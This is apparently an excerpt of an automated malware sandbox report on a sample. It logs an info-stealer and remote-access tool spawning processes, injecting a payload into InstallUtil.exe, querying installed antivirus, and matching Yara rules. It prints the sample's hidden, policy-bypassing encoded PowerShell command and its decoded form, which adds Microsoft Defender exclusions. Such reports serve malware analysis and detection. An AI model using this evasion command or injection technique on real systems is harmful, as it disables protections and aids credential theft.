Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==
Source: unknown | Process created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\jones\AppData\Local,C:\Users\jones\AppData\Local\Temp\; Add-MpPreference -ExclusionProcess TypeId.exe;
Source: unknown | Process created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\jones\AppData\Local,C:\Users\jones\AppData\Local\Temp\; Add-MpPreference -ExclusionProcess TypeId.exe;
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 404000
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 406000
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: EC3008
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -executionpolicy bypass -windowstyle hidden -noprofile -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabmag8aywbhagwalabdadoaxabvahmazqbyahmaxabqag8abgblahmaxabbahaacabeageadabhafwatabvagmayqbsafwavablag0acabcadsaiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaalqbfahgaywbsahuacwbpag8abgbqahiabwbjaguacwbzacaavab5ahaazqbjagqalgblahgazqa7aa==
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -executionpolicy bypass -windowstyle hidden -noprofile -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabmag8aywbhagwalabdadoaxabvahmazqbyahmaxabqag8abgblahmaxabbahaacabeageadabhafwatabvagmayqbsafwavablag0acabcadsaiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaalqbfahgaywbsahuacwbpag8abgbqahiabwbjaguacwbzacaavab5ahaazqbjagqalgblahgazqa7aa==
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Queries volume information: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe VolumeInformation
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 0.2.file.exe.459c2e8.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.TypeId.exe.4a46068.12.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.TypeId.exe.4a96088.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.440c2a8.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.b070000.26.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.TypeId.exe.427ffc0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.InstallUtil.exe.4ae3330.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.TypeId.exe.4a96088.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.txxbiwtbs.exe.3c19948.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.txxbiwtbs.exe.3c19948.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.InstallUtil.exe.4ae3330.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.440c2a8.9.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.txxbiwtbs.exe.7520000.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.445c2c8.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.InstallUtil.exe.91a2688.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.526a0e8.8.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.4e9edb0.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.InstallUtil.exe.91a2688.15.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.8f40000.23.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.459c2e8.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.b070000.26.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.InstallUtil.exe.4259570.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.InstallUtil.exe.4259570.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.txxbiwtbs.exe.7520000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.4e7ed90.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.8f40000.23.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.6b60000.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.InstallUtil.exe.4059550.7.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.4e9edb0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.526a0e8.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.TypeId.exe.427ffc0.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.6b60000.12.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.InstallUtil.exe.4659590.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.TypeId.exe.4c760c8.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.445c2c8.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.TypeId.exe.4a46068.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.TypeId.exe.4c760c8.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.4e7ed90.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.TypeId.exe.494cee0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.InstallUtil.exe.4659590.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.478c788.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.InstallUtil.exe.4059550.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000004.00000002.3019858995.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.2048354854.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.2167920075.0000000007520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1808267831.0000000008F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1783529566.0000000006B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000004.00000002.3204622217.0000000009049000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.1869188121.0000000004131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000004.00000002.3019858995.0000000004659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1767868411.000000000478C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1830742150.000000000B070000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1767868411.0000000004378000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000004.00000002.3019858995.0000000004058000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1767868411.0000000005266000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1790879005.0000000007CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: file.exe PID: 7600, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: TypeId.exe PID: 7764, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 8028, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: 0.2.file.exe.459c2e8.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.TypeId.exe.4a46068.12.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.TypeId.exe.4a96088.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.440c2a8.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.b070000.26.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.TypeId.exe.427ffc0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.InstallUtil.exe.4ae3330.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.TypeId.exe.4a96088.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.txxbiwtbs.exe.3c19948.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.txxbiwtbs.exe.3c19948.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.InstallUtil.exe.4ae3330.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.440c2a8.9.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.txxbiwtbs.exe.7520000.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.445c2c8.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.InstallUtil.exe.91a2688.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.526a0e8.8.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.4e9edb0.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.InstallUtil.exe.91a2688.15.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.8f40000.23.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.459c2e8.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.b070000.26.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.InstallUtil.exe.4259570.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.InstallUtil.exe.4259570.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.txxbiwtbs.exe.7520000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.4e7ed90.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.8f40000.23.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.6b60000.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.InstallUtil.exe.4059550.7.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.4e9edb0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.526a0e8.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.TypeId.exe.427ffc0.3.unpack, type: UNPACKEDPE
